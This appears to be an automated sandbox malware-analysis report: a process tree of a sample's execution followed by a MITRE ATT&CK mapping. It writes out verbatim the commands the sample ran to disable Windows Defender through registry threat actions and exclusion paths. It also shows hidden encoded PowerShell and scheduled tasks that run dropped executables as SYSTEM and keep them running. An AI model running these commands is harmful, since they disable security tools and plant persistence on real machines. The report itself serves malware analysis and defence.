C:\Users\Admin\AppData\Local\Temp\4E2E.exe
C:\Users\Admin\AppData\Local\Temp\4E2E.exe
1⤵
PID:49252

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
2⤵
PID:3552

C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
2⤵
PID:50156

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
PID:2412

C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
2⤵
PID:50784

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
3⤵
PID:48308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 48524 -ip 48524
1⤵
PID:49580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 48524 -ip 48524
1⤵
PID:50160

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:49656

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:48904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48904 -s 600
3⤵
- Program crash
PID:31592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 48904 -ip 48904
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 48524 -ip 48524
1⤵
PID:48092

C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\qSLPdIl.exe
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\qSLPdIl.exe d8 /site_id 525403 /S
1⤵
PID:49608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:48292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:50712

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:50564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:50376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:51448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:51644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:51876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:52036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:52188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:50580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:50984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:50616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:47888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:48516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:51068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
- Executes dropped EXE
PID:48468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:52188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:48928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:51040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:48516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:50580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:49784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
- Executes dropped EXE
PID:48424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCMDmHxGrLJHC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCMDmHxGrLJHC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jIUrjTqJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jIUrjTqJU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVCmSimpmwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVCmSimpmwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\twylNxKJekDU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\twylNxKJekDU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CEEEIGvNcEpIBnVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CEEEIGvNcEpIBnVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fwhiGQHhSfnZUzkc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fwhiGQHhSfnZUzkc\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:52292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:52952

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:52976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:53236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:50868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:50336

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:52976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:52988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CEEEIGvNcEpIBnVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:53344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh /t REG_DWORD /d 0 /reg:32
3⤵
PID:53384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh /t REG_DWORD /d 0 /reg:64
3⤵
PID:53424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fwhiGQHhSfnZUzkc /t REG_DWORD /d 0 /reg:32
3⤵
PID:53464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fwhiGQHhSfnZUzkc /t REG_DWORD /d 0 /reg:64
3⤵
PID:53504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CEEEIGvNcEpIBnVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:53304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:53264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3708

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:51172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3708

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRlJRbIUz" /SC once /ST 03:51:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:53556

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRlJRbIUz"
2⤵
PID:53304

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRlJRbIUz"
2⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "HqggdVJZxuzvaULcA" /SC once /ST 03:25:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\TRglGDZ.exe\" Av /site_id 525403 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:4416

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "HqggdVJZxuzvaULcA"
2⤵
PID:708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 48524 -ip 48524
1⤵
PID:49888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:49928

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:103280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 48524 -ip 48524
1⤵
PID:3032

C:\Users\Admin\AppData\Local\Temp\AC5C.exe
C:\Users\Admin\AppData\Local\Temp\AC5C.exe
1⤵
PID:50348

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:50412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 48524 -ip 48524
1⤵
PID:50404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4472 -ip 4472
1⤵
PID:50460

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:50548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 48524 -ip 48524
1⤵
PID:50636

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe
1⤵
PID:50132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:55980

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:103152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4472 -ip 4472
1⤵
PID:72332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 48524 -ip 48524
1⤵
PID:102988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:103400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:103392

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1704

C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\TRglGDZ.exe
C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\TRglGDZ.exe Av /site_id 525403 /S
1⤵
PID:3484

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bGZpGlqvDNKjraWjlZ"
2⤵
PID:4892

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:4324

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:260

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:4056

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:860

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jIUrjTqJU\NIDROO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IyXvSOFErlMUKai" /V1 /F
2⤵
- Creates scheduled task(s)
PID:4900

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4780

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2032

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:1292

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
2⤵
- Creates scheduled task(s)
PID:2096

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery